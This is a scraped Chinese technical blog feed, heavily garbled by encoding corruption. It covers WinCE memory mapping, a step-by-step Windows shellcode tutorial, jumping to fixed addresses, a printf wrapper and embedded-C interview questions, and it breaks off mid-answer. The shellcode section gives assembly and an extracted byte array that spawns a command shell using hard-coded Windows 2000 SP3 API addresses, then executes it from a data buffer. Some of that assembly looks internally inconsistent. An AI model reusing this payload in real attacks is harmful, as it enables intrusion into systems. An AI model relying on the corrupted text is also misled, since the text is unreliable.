CEDDK�q�提供了函数MmMapIoSpace用来把一�D늉�理内存直接映��到虚拟内存。此函数的原形如下：

PVOID MmMapIoSpace(

PHYSICAL_ADDRESS PhysicalAddress, // 起始物理地址

ULONG NumberOfBytes,                  // 要映��的字节�?/span>

BOOLEAN CacheEnable                   // 是否�~�存

);

其实�Q?/span>MmMapIoSpace函数内部也是调用VirtualAlloc�?/span>VirtualCopy函数来实现物理地址到虚拟地址的映��的�?/span>MmMapIoSpace函数的原代码是公开的，我们可以�?/span>%_WINCEROOT%\PUBLIC\COMMON\OAK\DRIVERS\CEDDK\DDK_MAP\ddk_map.c得到。从MmMapIoSpace的实现我们也可以看出VirtualAlloc�?/span>VirtualCopy的用法：

PVOID MmMapIoSpace (

    IN PHYSICAL_ADDRESS PhysicalAddress,

    IN ULONG NumberOfBytes,

    IN BOOLEAN CacheEnable

    )

{

PVOID pVirtualAddress; ULONGLONG SourcePhys;

ULONG SourceSize; BOOL bSuccess;

    SourcePhys = PhysicalAddress.QuadPart & ~(PAGE_SIZE - 1);

    SourceSize = NumberOfBytes + (PhysicalAddress.LowPart & (PAGE_SIZE - 1));

    pVirtualAddress = VirtualAlloc(0, SourceSize, MEM_RESERVE, PAGE_NOACCESS);

    if (pVirtualAddress != NULL)

    {

        bSuccess = VirtualCopy(

            pVirtualAddress, (PVOID)(SourcePhys >> 8), SourceSize,

            PAGE_PHYSICAL | PAGE_READWRITE | (CacheEnable ? 0 : PAGE_NOCACHE));

        if (bSuccess) {

            (ULONG)pVirtualAddress += PhysicalAddress.LowPart & (PAGE_SIZE - 1);

        }

        else {

            VirtualFree(pVirtualAddress, 0, MEM_RELEASE);

            pVirtualAddress = NULL;

        }

    }

    return pVirtualAddress;

}

此外�Q?/span>Windows CE�q�供�?/span>AllocPhysMem函数�?/span>FreePhysMem函数�Q�用来申请和释放一�D�连�l�的物理内存。函数可以保证申��L��物理内存是连�l�的�Q�如果函数成功，会返回虚拟内存的句柄和物理内存的起始地址。这对于DMA讑֤��ؓ有用。在�q�里��׃��详细介绍了，读者可以参�?/span>Windows CE的联机文��?/span>

井泉 2007-11-15 12:28 发表评论

�Q��{�Q�打造Windows下自��q��ShellCode

井泉 — Mon, 20 Aug 2007 09:17:00 GMT

��Z��帮助初学者了解ShellCode的编写，�q�能一步一步操作得到自��q��ShellCode�Q�因此将Windows下ShellCode的编写过�E�作详细的介�l�，以利于像我一��L��菜鸟�Q�最�l�能够写出简单的但却是真实的ShellCode�Q�而进一步高�U�的ShellCode的编写，也会在系列后面的文章中一步一步的演示的，希望大家会发玎ͼ�Exp真好�Q�ShellCode最��妙�Q?
ShellCode��介和�~�写步骤
从以前的文章和别人的��d��代码中可以知道，ShellCode是以“\xFF\x3A\x45\x72……”的�Ş式出现在�E�序中的�Q�而Exploit的构造就是想方设法地使计��机能�{到我们的ShellCode上来�Q�去执行“\xFF\x3A\x45\x72……”――由此看出，ShellCode才是Exploit��d��的真正主宎ͼ��如同独行者是我们文章的主��C��P��。而ShellCode�?#8220;\xFF\x3A\x45\x72……”那些��|��其实是机器码的�Ş式，和一般程序在内存里面存的东东是没什么两��L��Q�攻�ȝ��序把内存里面的数据动态改成ShellCode的��|��再蟩�q�去执行�Q�就如同执行一个在内存中的一般程序一��P��只不�q�完成的是我们的功能�Q�溢出攻��d��q�样实现了�?
在此可以下个定义�Q�ShellCode��是一�D늨�序的机器码�Ş式，而ShellCode的编写过�E�，��是得到我们惌��E�序的机器码的过�E��?
当然ShellCode的特�D�性和Windows下函数调用的特点�Q�决定了和一般的汇编�E�序有所不同。所以其�~�写步骤应该是，
1�Q�构想ShellCode的功能；
2�Q�用C语言验证实现�Q?br>3�Q�根据C语言实现�Q�改成带有ShellCode特点的汇�~�；
4�Q�最后得到机器码形式的ShellCode�?br>其中最重要的是�W�三步――改成有ShellCode特点的汇�~�，��在本文的后面讲到�?
首先�W�一步是构想ShellCode的功能。我们想要的功能可能是植入木马，杀掉防火墙�Q�倒流时光�Q�发�늣�波找外星人等�{�（WTF�Q�咳……�Q�，但最基本的功能，�q�是希望开一个DOS�H�口�Q�那我们可以在DOS�H�口中做很多事情�Q�所以先介绍开DOS�H�口ShellCode的写法吧�?
C语言代码
比如下面�q�个�E�序��可以完成开DOS�H�口的功能，大家详细看下注释�Q?
#include
#include
typedef void (*MYPROC)(LPTSTR); //定义函数指针
int main()
{
HINSTANCE LibHandle;
MYPROC ProcAdd;
LibHandle = LoadLibrary(“msvcrt.dll”);
ProcAdd = (MYPROC) GetProcAddress(LibHandle, "System"); //查找System函数地址
(ProcAdd) ("command.com"); //其实��是执行System(“command.com”)
return 0;
}
其实执行System(“command.com”)也可以完成开DOS�H�口的功能，写成�q�么复杂是有原因的，解释一下该�E�序�Q�首先Typedef void (*MYPROC)(LPTSTR)是定义一个函数指针类型，该类型的函数参数为是字符�Ԍ��q�回��gؓ�I�。接着定义MYPROC ProcAdd�Q��ProcAdd为指向参��Cؓ是字�W�串�Q�返回��gؓ�I�的函数指针�Q��用LoadLibrary(“msvcrt.dll”);装蝲动态链接库msvcrt.dll�Q�再使用ProcAdd = (MYPROC) GetProcAddress(LibHandle, System)获得 System的真实地址�q�赋�l�ProcAdd�Q�之后ProcAdd里存的就是System函数的地址�Q�以后��用这个地址来调用System函数�Q�最�?ProcAdd) ("command.com")��是调用System("command.com")�Q�可以获得一个DOS�H�口。在�H�口中我们可以执行Dir�Q�Copy�{�命令。如下图1所�C��?

screen.width*0.7) {this.resized=true; this.width=screen.width*0.7; this.style.cursor='hand'; this.alt='Click here to open new window\nCTRL+Mouse wheel to zoom in/out';}" onclick="if(!this.resized) {return true;} else {window.open('http://dx.3800hk.com/news/UploadFiles_9994/200511/20051117052428759.jpg');}" alt="" onerror=javascript:errpic(this) src="http://dx.3800hk.com/news/UploadFiles_9994/200511/20051117052428759.jpg" onload="if(this.width>screen.width*0.7) {this.resized=true; this.width=screen.width*0.7; this.alt='Click here to open new window\nCTRL+Mouse wheel to zoom in/out';}" border=0>

�?
获得函数的地址
�E�序中用GetProcAddress函数获得System的真实地址�Q�但地址�I�竟是多��，如何查看呢？
在VC中，我们按F10�q�入调试状态，然后在Debug工具栏中�Ҏ��后一个按钮Disassemble和第四个按钮Registers�Q�这样出��C��源程序的汇编代码和寄存器状态窗口，如图2所�C?

screen.width*0.7) {this.resized=true; this.width=screen.width*0.7; this.style.cursor='hand'; this.alt='Click here to open new window\nCTRL+Mouse wheel to zoom in/out';}" onclick="if(!this.resized) {return true;} else {window.open('http://dx.3800hk.com/news/UploadFiles_9994/200511/20051117052429291.jpg');}" alt="" onerror=javascript:errpic(this) src="http://dx.3800hk.com/news/UploadFiles_9994/200511/20051117052429291.jpg" onload="if(this.width>screen.width*0.7) {this.resized=true; this.width=screen.width*0.7; this.alt='Click here to open new window\nCTRL+Mouse wheel to zoom in/out';}" border=0>

�?
�l�箋按F10执行�Q�直到到ProcAdd = (MYPROC) GetProcAddress(LibHandle, "System")语句下的Cll dword ptr [__imp__GetProcAddress@8 (00424194)]执行后，EAX变�ؓ7801AFC3�Q�说明在我的机器上System( )函数的地址�?x7801AFC3。如�?所�C��?

screen.width*0.7) {this.resized=true; this.width=screen.width*0.7; this.style.cursor='hand'; this.alt='Click here to open new window\nCTRL+Mouse wheel to zoom in/out';}" onclick="if(!this.resized) {return true;} else {window.open('http://dx.3800hk.com/news/UploadFiles_9994/200511/20051117052429721.jpg');}" alt="" onerror=javascript:errpic(this) src="http://dx.3800hk.com/news/UploadFiles_9994/200511/20051117052429721.jpg" onload="if(this.width>screen.width*0.7) {this.resized=true; this.width=screen.width*0.7; this.alt='Click here to open new window\nCTRL+Mouse wheel to zoom in/out';}" border=0>

�?
WTF�Q�注意本�ơ测试中读者的机器是Windows 2000 SP3�Q�不同环境可能地址不同�?
��Z��么EAX��是System( )函数的地址呢？那是因�ؓ函数执行的返回��|��在汇�~�下通常是放在EAX中的�Q�这��是计算机系�l�的�U�定吧，所以GetProcAddress�Q?#8221;System”�Q�的�q�回��|��System函数的地址�Q�，��在EAX中，�?x7801AFC3�?
Windows下函数的调用原理
��Z��么要�q�么�ȝ��的得到System函数的地址呢？�q�是因�ؓ在Windows下，函数的调用方法是先将参数从右到左压入堆栈�Q�然后Call该函数的地址。比如执行函数Fun�Q�argv1, argv2�Q�，先把参数从右到左压入堆栈�Q�这里就是依�ơ把argv2�Q�argv1压入堆栈里，然后Call Fun函数的地址。这里的Call Fun函数地址�Q�其实等于两步，一是把保存当前EIP�Q�二是蟩到Func函数的地址执行�Q�即Push EIP �Q?Jmp Fun。其�q�程如下�?所�C��?

screen.width*0.7) {this.resized=true; this.width=screen.width*0.7; this.style.cursor='hand'; this.alt='Click here to open new window\nCTRL+Mouse wheel to zoom in/out';}" onclick="if(!this.resized) {return true;} else {window.open('http://dx.3800hk.com/news/UploadFiles_9994/200511/20051117052429460.jpg');}" alt="" onerror=javascript:errpic(this) src="http://dx.3800hk.com/news/UploadFiles_9994/200511/20051117052429460.jpg" onload="if(this.width>screen.width*0.7) {this.resized=true; this.width=screen.width*0.7; this.alt='Click here to open new window\nCTRL+Mouse wheel to zoom in/out';}" border=0>

�?
同理�Q�我们要执行System("command.com")�Q�首先参数入栈，�q�里只有一个参敎ͼ�所以就把Command.com的地址压入堆栈�Q�注意是Command.com字符串的地址�Q�然后Call System函数的地址�Q�就完成了执行。如�?所�C��?

screen.width*0.7) {this.resized=true; this.width=screen.width*0.7; this.style.cursor='hand'; this.alt='Click here to open new window\nCTRL+Mouse wheel to zoom in/out';}" onclick="if(!this.resized) {return true;} else {window.open('http://dx.3800hk.com/news/UploadFiles_9994/200511/20051117052430710.jpg');}" alt="" onerror=javascript:errpic(this) src="http://dx.3800hk.com/news/UploadFiles_9994/200511/20051117052430710.jpg" onload="if(this.width>screen.width*0.7) {this.resized=true; this.width=screen.width*0.7; this.alt='Click here to open new window\nCTRL+Mouse wheel to zoom in/out';}" border=0>

�?
构造有ShellCode特点的汇�~?
明白了Windows函数的执行原理，我们要执行System(“Command.exe”)�Q�就要先把Command.exe字符串的地址入栈�Q�但Command.exe字符串在哪儿呢？内存中可能没有，但我们可以自己构造！
我们�?#8216;Command.exe’一个字�W�一个字�W�的赋给堆栈�Q�这�?#8216;Command.exe’字符串就有了�Q�而栈��的指针ESP正好是Command.exe字符串的地址�Q�我们Push esp�Q�就完成了参数――Command.exe字符串的地址入栈。如下图6所�C��?

screen.width*0.7) {this.resized=true; this.width=screen.width*0.7; this.style.cursor='hand'; this.alt='Click here to open new window\nCTRL+Mouse wheel to zoom in/out';}" onclick="if(!this.resized) {return true;} else {window.open('http://dx.3800hk.com/news/UploadFiles_9994/200511/20051117052430841.jpg');}" alt="" onerror=javascript:errpic(this) src="http://dx.3800hk.com/news/UploadFiles_9994/200511/20051117052430841.jpg" onload="if(this.width>screen.width*0.7) {this.resized=true; this.width=screen.width*0.7; this.alt='Click here to open new window\nCTRL+Mouse wheel to zoom in/out';}" border=0>

�?
参数入栈了，然后该Call System函数的地址。刚才已�l�看刎ͼ�在Windows 2000 SP3上，System函数的地址�?x7801AFC3�Q�所以Call 0x7801AFC3��p��了�?br>把思�\合�v来，可以写出执行System(“Command.exe”)的带有ShellCode特点的汇�~�代码如下�?
mov esp,ebp ;
push ebp ;
mov ebp,esp ; 把当前esp赋给ebp
xor edi,edi ;
push edi ;压入0�Q�esp�Q?,; 作用是构造字�W�串的结��\0字符�?
sub esp,08h ;加上上面�Q�一共有12个字�?;用来�?command.com"�?
mov byte ptr [ebp-0ch],63h ; c
mov byte ptr [ebp-0bh],6fh ; o
mov byte ptr [ebp-0ah],6dh ; m
mov byte ptr [ebp-09h],6Dh ; m
mov byte ptr [ebp-08h],61h ; a
mov byte ptr [ebp-07h],6eh ; n
mov byte ptr [ebp-06h],64h ; d
mov byte ptr [ebp-05h],2Eh ; .
mov byte ptr [ebp-04h],63h ; c
mov byte ptr [ebp-03h],6fh ; o
mov byte ptr [ebp-02h],6dh ; m一个一个生成串"command.com".
lea eax,[ebp-0ch] ;
push eax ; command.com串地址作�ؓ参数入栈
mov eax, 0x7801AFC3 ;
call eax ; call System函数的地址
明白了原理再看实玎ͼ�是不是清楚了很多呢？
提取ShellCode
首先来验证一下，在VC中可以用__asm关键字插入汇�~�，我们把System(“Command.exe”)用我们写的汇�~�替换，LoadLibrary先不动，然后执行�Q�成功！弹出了我们想要的DOS�H�口。如下图7所�C��?

screen.width*0.7) {this.resized=true; this.width=screen.width*0.7; this.style.cursor='hand'; this.alt='Click here to open new window\nCTRL+Mouse wheel to zoom in/out';}" onclick="if(!this.resized) {return true;} else {window.open('http://dx.3800hk.com/news/UploadFiles_9994/200511/20051117052430346.jpg');}" alt="" onerror=javascript:errpic(this) src="http://dx.3800hk.com/news/UploadFiles_9994/200511/20051117052430346.jpg" onload="if(this.width>screen.width*0.7) {this.resized=true; this.width=screen.width*0.7; this.alt='Click here to open new window\nCTRL+Mouse wheel to zoom in/out';}" border=0>

�?
同样的道理，LoadLibrary(“msvcrt.dll”)也仿照上面改成汇�~�，注意LoadLibrary在Windows 2000 SP3上的地址�?x77e69f64。把两段汇编合�v来，��其�~�译、链接、执行，也成功了�Q�如下图8所�C��?

screen.width*0.7) {this.resized=true; this.width=screen.width*0.7; this.style.cursor='hand'; this.alt='Click here to open new window\nCTRL+Mouse wheel to zoom in/out';}" onclick="if(!this.resized) {return true;} else {window.open('http://dx.3800hk.com/news/UploadFiles_9994/200511/20051117052430809.jpg');}" alt="" onerror=javascript:errpic(this) src="http://dx.3800hk.com/news/UploadFiles_9994/200511/20051117052430809.jpg" onload="if(this.width>screen.width*0.7) {this.resized=true; this.width=screen.width*0.7; this.alt='Click here to open new window\nCTRL+Mouse wheel to zoom in/out';}" border=0>

�?
有了上面的工作，提取ShellCode��只剩下体力�z�M��。我们对刚才的全汇编的程序，按F10�q�入调试�Q�接着按下Debug工具栏的Disassembly按钮�Q�点右键�Q�在弹出菜单中选中Code Bytes�Q�就出现汇编对应的机器码。因为汇�~�可以完全完成我们的功能�Q�所以我们把汇编对应的机器码原封不动抄下来，��得到我们想要的ShellCode了。提取出来的ShellCode如下�?
unsigned char shellcode[] =
"\x55\x8B\xEC\x33\xC0\x50\x50\x50\xC6\x45\xF4\x4D\xC6\x45\xF5\x53"
"\xC6\x45\xF6\x56\xC6\x45\xF7\x43\xC6\x45\xF8\x52\xC6\x45\xF9\x54\xC6\x45\xFA\x2E\xC6"
"\x45\xFB\x44\xC6\x45\xFC\x4C\xC6\x45\xFD\x4C\xBA"
"\x64\x9f\xE6\x77" //sp3 loadlibrary地址0x77e69f64
"\x52\x8D\x45\xF4\x50"
"\xFF\x55\xF0"
"\x55\x8B\xEC\x83\xEC\x2C\xB8\x63\x6F\x6D\x6D\x89\x45\xF4\xB8\x61\x6E\x64\x2E"
"\x89\x45\xF8\xB8\x63\x6F\x6D\x22\x89\x45\xFC\x33\xD2\x88\x55\xFF\x8D\x45\xF4"
"\x50\xB8"
"\xc3\xaf\x01\x78" //sp3 System地址0x7801afc3
"\xFF\xD0";
验证ShellCode
最后要验证提取出来的ShellCode能否完成我们的功能。在以前的文章中已经说过�Ҏ��Q�只需要新��Z��个工�E�和c源文�Ӟ��然后把ShellCode部分拷下来，存�ؓ一个数�l�，最后在main中添�? (void(*)(void)) &shellcode )()�Q�如下：
unsigned char shellcode[] =
"\x55\x8B\xEC\x33\xC0\x50\x50\x50\xC6\x45\xF4\x4D\xC6\x45\xF5\x53"
"\xC6\x45\xF6\x56\xC6\x45\xF7\x43\xC6\x45\xF8\x52\xC6\x45\xF9\x54\xC6\x45\xFA\x2E\xC6"
"\x45\xFB\x44\xC6\x45\xFC\x4C\xC6\x45\xFD\x4C\xBA"
"\x64\x9f\xE6\x77" //sp3 loadlibrary地址0x77e69f64
"\x52\x8D\x45\xF4\x50"
"\xFF\x55\xF0"
"\x55\x8B\xEC\x83\xEC\x2C\xB8\x63\x6F\x6D\x6D\x89\x45\xF4\xB8\x61\x6E\x64\x2E"
"\x89\x45\xF8\xB8\x63\x6F\x6D\x22\x89\x45\xFC\x33\xD2\x88\x55\xFF\x8D\x45\xF4"
"\x50\xB8"
"\xc3\xaf\x01\x78" //sp3 System地址0x7801afc3
"\xFF\xD0";
int main()
{
( (void(*)(void)) &shellcode )()
return 0;
}
( (void(*)(void)) &shellcode )()�q�句话是关键�Q�它把ShellCode转换成一个参��Cؓ�I�，�q�回为空的函数指针，�q�调用它。执行那句就相当于执行ShellCode数组里的那些数据。如果ShellCode正确�Q�就会完成我们想要的功能�Q�出��C��个DOS�H�口。我们亲自编写的�W�一个ShellCode成功完成�Q?

��结
�q�个ShellCode的功能还比较单薄�Q�而且通用性也待进一步研�IӞ��但的��是一个由我们亲自打造出来的ShellCode�Q�而且现实中的ShellCode也是�q�样写出来的。只要我们掌握了基本的方法，以后��可以在�q�K��的空间中自由��q��Q?/div>

井泉 2007-08-20 17:17 发表评论

�Q��{�Q�利用函数将�E�序跌��{到固定地址执行

井泉 — Fri, 10 Aug 2007 07:28:00 GMT

---------------------------------------------
定义函数void (* my_function)(void);

在程序中赋��|��

my_function = 0x00;

然后调用函数�Q?/p>
my_function();

�E�序��׃��跌��{�?x00地址开始执行，常用于BootLoader�E�序中．

�c�M��的还有直接向某个地址写入数据�Q?/p>
int *my_address = 0x05555555;

*my_address = 0x22222222;

直接�?x05555555地址写入数据0x22222222.

井泉 2007-08-10 15:28 发表评论

自己的printf

井泉 — Tue, 17 Oct 2006 03:28:00 GMT
#include "stdarg.h"
int my_printf (const char *format, ...)
{
va_list arg;
int done;

va_start (arg, format);
done = vprintf (format, arg);
va_end (arg);
return done;
}

vprintf是printf的底层实现细�?br />加上宏定义就可以方便的实现开/兌��试信息了�?img src ="http://www.shnenglu.com/zjj2816/aggbug/13770.html" width = "1" height = "1" />

井泉 2006-10-17 11:28 发表评论

井泉 — Mon, 24 Jul 2006 07:43:00 GMT
1 . 用预处理指��o#define 声明一个常敎ͼ�用以表明1�q�中有多��秒�Q�忽略闰�q�问题）
#define SECONDS_PER_YEAR (60 * 60 * 24 * 365)UL
我在�q�想看到几�g事情�Q?br />1) #define 语法的基本知识（例如�Q�不能以分号�l�束�Q�括��L��使用�Q�等�{�）
2)懂得预处理器��ؓ你计��常数表辑ּ�的��|��因此�Q�直接写��Z��是如何计��一�q�中有多��秒而不是计��出实际的��|��是更清晰而没有代��L��?br />3) 意识到这个表辑ּ��一�?6位机的整型数溢出-因此要用到长整型�W�号L,告诉�~�译器这个常数是的长整型数�?br />4) 如果你在你的表达式中用到UL�Q�表�C�无�W�号长整型）�Q�那么你有了一个好的�v炏V��记住，�W�一印象很重要�?br />
2 . 写一�?标准"宏MIN �Q�这个宏输入两个参数�q�返回较��的一个�?br />#define MIN(A,B) �Q�（A�Q?<= (B) ? (A) : (B)) �q�个��试是�ؓ下面的目的而设的：
1) 标识#define在宏中应用的基本知识。这是很重要的。因为在嵌入(inline)操作�W?变�ؓ标准C的一部分之前�Q�宏是方便��生嵌入代码的唯一�Ҏ��Q�对于嵌入式�pȝ��来说�Q��ؓ了能辑ֈ�要求的性能�Q�嵌入代码经常是必须的方法�?br />2)三重条�g操作�W�的知识。这个操作符存在C语言中的原因是它使得�~�译器能产生比if-then-else更优化的代码�Q�了解这个用法是很重要的�?br />3) 懂得在宏中小心地把参数用括号括�v�?br />4) 我也用这个问题开始讨论宏的副作用�Q�例如：当你写下面的代码时会发生什么事�Q?br />least = MIN(*p++, b);

3. 预处理器标识#error的目的是什么？
如果你不知道�{�案�Q�请看参考文�?。这问题对区分一个正常的伙计和一个书呆子是很有用的。只有书呆子才会读C语言课本的附录去扑և�象这�U�问题的�{�案。当然如果你不是在找一个书呆子�Q�那么应试者最好希望自�׃��要知道答案�?br />
��d�@环（Infinite loops�Q?br />4. 嵌入式系�l�中�l�常要用到无限��@环，你怎么��L��C�~�写��d�@环呢�Q?�q�个问题用几个解��x��案�?
我首选的�Ҏ��是：
while(1)
{

}
一些程序员更喜�Ƣ如下方案：
for(;;)
{

}
�q�个实现方式让我为难�Q�因��个语法没有确切表辑ֈ�底怎么回事。如果一个应试者给��个作为方案，我将用这个作��Z��个机会去探究他们�q�样做的基本原理。如果他们的基本�{�案是："我被教着�q�样做，但从没有惛_��q��ؓ什么�?�q�会�l�我留下一个坏印象�?br />�W�三个方案是�?goto
Loop:
...
goto Loop;
应试者如�l�出上面的方案，�q�说明或者他是一个汇�~�语�a��E�序员（�q�也许是好事�Q�或者他是一个想�q�入新领域的BASIC/FORTRAN�E�序员�?br />
数据声明�Q�Data declarations�Q?
5. 用变量a�l�出下面的定�?br />a) 一个整型数�Q�An integer�Q?
b)一个指向整型数的指针（ A pointer to an integer�Q?
c)一个指向指针的的指针，它指向的指针是指向一个整型数�Q?A pointer to a pointer to an intege�Q�r
d)一个有10个整型数的数�l�（ An array of 10 integers�Q?
e) 一个有10个指针的数组�Q�该指针是指向一个整型数的。（An array of 10 pointers to
integers�Q?
f) 一个指向有10个整型数数组的指针（ A pointer to an array of 10 integers�Q?
g) 一个指向函数的指针�Q�该函数有一个整型参数�ƈ�q�回一个整型数�Q�A pointer to a function
that takes an integer as an argument and returns an integer�Q?
h) 一个有10个指针的数组�Q�该指针指向一个函敎ͼ�该函数有一个整型参数�ƈ�q�回一个整型数�Q?An array of ten pointers to functions that take an integer argument and return an integer �Q?br />�{�案是：
a) int a; // An integer
b) int *a; // A pointer to an integer
c) int **a; // A pointer to a pointer to an integer
d) int a[10]; // An array of 10 integers
e) int *a[10]; // An array of 10 pointers to integers
f) int (*a)[10]; // A pointer to an array of 10 integers
g) int (*a)(int); // A pointer to a function a that
takes an integer argument and returns an integer
h) int (*a[10])(int); // An array of 10 pointers to
functions that take an integer argument and return an
integer
��Z��l�常声称�q�里有几个问题是那种要翻一下书才能回答的问题，我同意这�U�说法。当我写�q�篇文章�Ӟ��Z��定语法的正��性，我的��查了一下书。但是当我被面试的时候，我期望被问到�q�个问题�Q�或者相�q�的问题�Q�。因为在被面试的�q�段旉��里，我确定我知道�q�个问题的答案。应试者如果不知道所有的�{�案�Q�或臛_��大部分答案）�Q�那么也��没有�ؓ�q�次面试做准备，如果该面试者没有�ؓ�q�次面试做准备，那么他又能�ؓ什么出准备呢？

Static
6. 关键字static的作用是什么？
�q�个��单的问题很少有�h能回�{�完全。在C语言中，关键字static有三个明昄��作用�Q?br />1)在函��C��Q�一个被声明为静态的变量在这一函数被调用过�E�中�l�持其��g��变�?br />2) 在模块内�Q�但在函��C��外）�Q�一个被声明为静态的变量可以被模块内所用函数访问，但不能被模块外其它函数访问。它是一个本地的全局变量�?br />3) 在模块内�Q�一个被声明为静态的函数只可被这一模块内的其它函数调用。那��是�Q�这个函数被限制在声明它的模块的本地范围内��用�?br />大多数应试者能正确回答�W�一部分�Q�一部分能正��回�{�第二部分，同是很少的�h能懂得第三部分。这是一个应试者的严重的缺点，因�ؓ他显然不懂得本地化数据和代码范围的好处和重要性�?br />
Const
7�Q�关键字const有什么含意？
我只要一听到被面试者说�Q?const意味着常数"�Q�我��q��道我正在和一个业余者打交道。去�q�Dan
Saks已经在他的文章里完全概括了const的所有用法，因此ESP(译者：Embedded Systems
Programming)的每一位读者应该非常熟悉const能做什么和不能做什�?如果你从没有��d��那篇文章�Q�只要能说出const意味着"只读"��可以了。尽��这个答案不是完全的�{�案�Q�但我接受它作�ؓ一个正��的�{�案。（如果你想知道更详�l�的�{�案�Q�仔�l�读一下Saks的文章吧。）
如果应试者能正确回答�q�个问题�Q�我��问他一个附加的问题�Q�下面的声明都是什么意思？
const int a;
int const a;
const int *a;
int * const a;
int const * a const;
/******/
前两个的作用是一��P��a是一个常整型数。第三个意味着a是一个指向常整型数的指针�Q�也��是�Q�整型数是不可修改的�Q�但指针可以�Q�。第四个意思a是一个指向整型数的常指针�Q�也��是��_��指针指向的整型数是可以修改的�Q�但指针是不可修改的�Q�。最后一个意味着a是一个指向常整型数的常指针（也就是说�Q�指针指向的整型数是不可修改的，同时指针也是不可修改的）。如果应试者能正确回答�q�些问题�Q�那么他��q��我留下了一个好印象。顺带提一句，也许你可能会问，即��不用关键�?�Q�也�q�是能很�Ҏ��写出功能正确的程序，那么我�ؓ什么还要如此看重关键字const呢？我也如下的几下理由：
1) 关键字const的作用是为给��M��代码的�h传达非常有用的信息，实际上，声明一个参��Cؓ帔R��是�ؓ了告诉了用户�q�个参数的应用目的。如果你曾花很多旉��清理其它人留下的垃圾�Q�你��׃��很快学会感谢�q�点多余的信息。（当然�Q�懂得用const的程序员很少会留下的垃圾让别人来清理的。）
2) 通过�l�优化器一些附加的信息�Q��用关键字const也许能��生更紧凑的代码�?br />3) 合理��C��用关键字const可以使编译器很自然地保护那些不希望被改变的参敎ͼ�防止其被无意的代码修攏V��简而言之，�q�样可以减少bug的出现�?br />
Volatile
8. 关键字volatile有什么含�?�q�给��Z��个不同的例子�?br />一个定义�ؓvolatile的变量是说这变量可能会被意想不到地改变，�q�样�Q�编译器��׃��会去假设�q�个变量的��g��。精��地说就是，优化器在用到�q�个变量时必��L��ơ都��心地重新读取这个变量的��|��而不是��用保存在寄存器里的备份。下面是volatile变量的几个例子：
1) �q�行讑֤�的硬件寄存器�Q�如�Q�状态寄存器�Q?br />2) 一个中断服务子�E�序中会讉K��到的非自动变�?Non-automatic variables)
3) 多线�E�应用中被几个�Q务共享的变量
回答不出�q�个问题的�h是不会被雇䄦的。我认�ؓ�q�是区分C�E�序员和嵌入式系�l�程序员的最基本的问题。搞嵌入式的家伙们经常同��g、中断、RTOS�{�等打交道，所有这些都要求用到volatile变量。不懂得volatile的内容将会带来灾难�?假设被面试者正��地回答了这是问题（嗯，怀疑是否会是这��P��Q�我��稍微深�I�一下，看一下这家伙是不是直正懂得volatile完全的重要性�?br />1)一个参数既可以是const�q�可以是volatile吗？解释��Z��么�?br />2); 一个指针可以是volatile 吗？解释��Z��么�?br />3); 下面的函数有什么错误：
int square(volatile int *ptr)
{
return *ptr * *ptr;
}
下面是答案：
1)是的。一个例子是只读的状态寄存器。它是volatile因�ؓ它可能被意想不到地改变。它是const因�ؓ�E�序不应该试囑֎�修改它�?br />2); 是的。尽��这�q�不很常见。一个例子是当一个中服务子程序修该一个指向一个buffer的指针时�?br />3) �q�段代码有点变态。这�D�代码的目的是用来返指针*ptr指向值的�q�x��Q�但是，�׃��*ptr指向一个volatile型参敎ͼ��~�译器将产生�c�M��下面的代码：
int square(volatile int *ptr)
{
int a,b;
a = *ptr;
b = *ptr;
return a * b;
}
�׃��*ptr的值可能被意想不到地该变，因此a和b可能是不同的。结果，�q�段代码可能�q�不是你所期望的��^方��|��正确的代码如下：
long square(volatile int *ptr)
{
int a;
a = *ptr;
return a * a;
}

位操作（Bit manipulation�Q?
9. 嵌入式系�l��L��要用户对变量或寄存器�q�行位操作。给定一个整型变量a�Q�写两段代码�Q�第一个设�|�a的bit 3�Q�第二个清除a 的bit 3。在以上两个操作中，要保持其它位不变�?对这个问题有三种基本的反�?br />1)不知道如何下手。该被面者从没做�q��Q何嵌入式�pȝ��的工作�?br />2) 用bit fields。Bit fields是被扔到C语言死角的东西，它保证你的代码在不同�~�译器之间是不可�U�L��的，同时也保证了的你的代码是不可重用的。我最�q�不�q�看�?Infineon为其较复杂的通信芯片写的驱动�E�序�Q�它用到了bit fields因此完全�Ҏ��无用�Q�因为我的编译器用其它的方式来实现bit fields的。从道�d�Ԍ��永远不要让一个非嵌入式的家伙�_�实际硬件的辏V�?br />3) �?#defines �?bit masks 操作。这是一个有极高可移植性的�Ҏ��Q�是应该被用到的�Ҏ��。最佳的解决�Ҏ��如下�Q?br />#define BIT3 (0x1 << 3)
static int a;
void set_bit3(void)
{
a |= BIT3;
}
void clear_bit3(void)
{
a &= ~BIT3;
}

一些�h喜欢��|�和清除��D��定义一个掩码同时定义一些说明常敎ͼ��q�也是可以接受的。我希望看到几个要点�Q�说明常数、|=�?amp;=~操作�?br />
讉K��固定的内存位�|�（Accessing fixed memory locations�Q?
10. 嵌入式系�l�经常具有要求程序员去访问某特定的内存位�|�的特点�?br />在某工程中，要求讄��一�l�对地址�?x67a9的整型变量的��gؓ0xaa66。编译器是一个纯�_�的ANSI�~�译器。写代码��d��成这一��d��。这一问题��试你是否知道�ؓ了访问一�l�对地址把一个整型数强制转换�Q�typecast�Q��ؓ一指针是合法的。这一问题的实现方式随着个�h风格不同而不同。典型的�c�M��代码如下�Q?br />int *ptr;
ptr = (int *)0x67a9;
*ptr = 0xaa55;
A more obscure approach is: ( 一个较晦�ӆ的方法是)�Q?br />*(int * const)(0x67a9) = 0xaa55;
即��你的品味更接�q�第二种�Ҏ��Q�但我徏议你在面试时使用�W�一�U�方案�?br />
中断�Q�Interrupts�Q?
11.
中断是嵌入式�pȝ��中重要的�l�成部分�Q�这��D��了很多编译开发商提供一�U�扩展—让标准C支持中断。具代表事实是，产生了一个新的关键字 __interrupt。下面的代码��׃��用了__interrupt关键字去定义了一个中断服务子�E�序(ISR)�Q�请评论一下这�D�代码的�?br />__interrupt double compute_area (double radius)
{
double area = PI * radius * radius;
printf("\nArea = %f", area);
return area;
}
�q�个函数有太多的错误了，以至让�h不知从何说�v了：
